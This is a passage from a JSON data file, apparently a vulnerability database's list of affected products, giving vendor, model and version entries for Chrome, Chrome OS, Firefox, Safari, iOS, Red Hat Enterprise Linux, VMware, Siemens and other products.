"5.0.330.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1001" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.18" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1056" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.33" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.768.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.82" }, { "model": "windows server for itanium-based systems sp2", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "2008" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.31" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.10.140.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1304.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.670.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.378.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.551.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.0" }, { "model": "sinumerik d sl ncu720.3", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "sinumerik panels wtih integrated tcu", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1037" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.2" }, { "model": "pyxis parassist system", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.2" }, { "model": "fusion", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "8.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1060" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.126" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.611.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.300.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.509.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.387.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.382.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.290.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22" }, { "model": "vcenter server", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.33" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.386.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.4" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.839.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1281.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1277.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.38" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.764.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.97" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.616.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.66" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.82" }, { "model": "enterprise linux for power big endian", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.4.154.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.22" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.45" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "4.3.4" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.1.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.777.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "45.0.2454" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.564.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1046" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.50" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "1.3.1" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.5" }, { "model": "sql server for 32-bit systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201420" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1081.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.868.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.19" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.9.126.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.42" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.397.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.70" }, { "model": "enterprise linux for power big endian extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.99" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.50" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201420" }, { "model": "ipad air", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.491.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1054.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1017.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.535.1" }, { "model": "enterprise linux server year extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-47.2" }, { "model": "enterprise linux for scientific computing", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.825.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.814.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.600.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.15" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.566.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.137" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "50.0.2661.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.877.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.860.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.475.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1070.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "7.1.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.958.1" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.94" }, { "model": "simatic ipc847c", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.10" }, { "model": "enterprise linux eus compute node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.108" }, { "model": "simatic itp1000", "scope": "ne", "trust": 0.3, "vendor": "siemens", "version": "v23.01.03" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1020.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.614.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.57" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.344.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.235" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.156.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.715.0" }, { "model": "ipod touch", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "0" }, { "model": "kiestra inoqula standalone", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.55" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.505.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1063.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.286.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.15" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.105" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.725.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "15.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.224" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.672.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.358.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.151" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.754.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.107" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.58" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.6" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.0.5" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "6.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1007" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.783.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "16.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1047" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1052" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.78" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.51" }, { "model": "simatic ipc277e", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1690.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "2.0" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "10.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.308" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.820.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1044.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.109" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.343" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.432.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.731.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.249.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.560.0" }, { "model": "safari", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "8.0.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.819.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.324.0" }, { "model": "enterprise linux for power big endian extended update support", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "-7.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1048" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "54.0.2840.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.125" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1032.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.162" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.29" }, { "model": "ios", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "9.3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 